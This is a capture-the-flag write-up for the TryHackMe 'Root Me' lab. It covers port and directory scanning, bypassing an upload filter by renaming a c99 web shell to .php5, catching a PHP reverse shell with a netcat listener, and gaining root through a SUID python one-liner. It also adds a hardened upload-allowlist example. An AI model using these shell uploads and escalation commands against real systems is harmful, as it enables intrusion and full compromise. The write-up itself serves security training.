Having fun with TryHackMe again. So, here is the write-up and guideline for passing the Root Me challenge.
Task: A CTF for beginners, can you root me?
Let's get started.
Scan the full port range and gather every bit of service information available for this machine's IP.
# nmap -A -T4 -sS -sV -p- 10.10.78.111
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
There are 2 ports open: 22 and 80. Now we need to find out whether there is any hidden directory, since there is no hint in the web page source code.
# gobuster dir -u 10.10.78.111 -w wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
/uploads (Status: 301) [Size: 314] [--> http://10.10.78.111/uploXXX/]
/css (Status: 301) [Size: 310] [--> http://10.10.78.111/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.78.111/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.78.111/paXXX/]
There are 2 interesting directories. Opening the /paXXX path shows the file upload page.
Now, let's try to upload a c99 shell.
The file upload blocks files with the .php extension. Let's rename it to .php5 and see if the upload allows it.
Alrighty. It's uploaded. Open the /uploXXX page to check whether the file landed there.
The file is indeed uploaded here. Let's open it.
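As an added example (not part of the original write-up), here is the kind of extension denylist the panel appears to use, reconstructed as an assumption from the behaviour above, beside an allowlist check that would have refused the renamed file; the allowed extensions and the random stored name are my choices, not the room's code.

```python
import os
import secrets
from pathlib import PurePosixPath

# Weak check, reconstructed as an assumption from the write-up: the panel refused
# only the exact ".php" suffix, so any other name passes, including "c99.php5".
def weak_check(filename: str) -> bool:
    return not filename.endswith(".php")

# Hardened check: allowlist only the few file types the panel actually needs.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

def hardened_check(filename: str) -> bool:
    # Ignore any directory component the client sends, with either separator.
    name = os.path.basename(filename.replace("\\", "/"))
    # Reject empty names, dotfiles and double extensions such as "a.tar.gz".
    if not name or name.startswith(".") or name.count(".") != 1:
        return False
    ext = PurePosixPath(name).suffix.lower()   # compare case-insensitively
    return ext in ALLOWED_EXTENSIONS

def safe_stored_name(filename: str) -> str:
    """Store under a server-generated name so the client never chooses the on-disk name."""
    if not hardened_check(filename):
        raise ValueError("upload rejected")
    ext = PurePosixPath(filename).suffix.lower()
    return secrets.token_hex(16) + ext

if __name__ == "__main__":
    for candidate in ("c99.php", "c99.php5", "holiday.JPG"):
        print(candidate, "weak:", weak_check(candidate), "hardened:", hardened_check(candidate))
```

Pair this with a web-server rule that does not hand files under /uploads to the PHP interpreter, so anything that slips through is served as plain bytes rather than executed.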
C99 shell is now running. Time to hunt the flag. Go through the shell. Found the user flag 😬
Let’s continue the hunt.
find / -type f -perm -04000 -ls
There is a list of SUID files. We need to check GTFOBins to see which of them can be abused, and it looks like /usr/bin/python is the one. C99 is unable to run a Python script here, so I need a reverse shell. Since file upload is available, I upload a PHP reverse shell file.
Start a netcat listener and open http://10.10.X.X/uploads/php-reverse-shell.php5
# nc -l -n -v -p 1234
Connection from 10.10.X.X:56058
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:51:30 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off$
Now we have access to a terminal. From GTFOBins, follow the SUID entry for python:
$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Done! Found the final flag!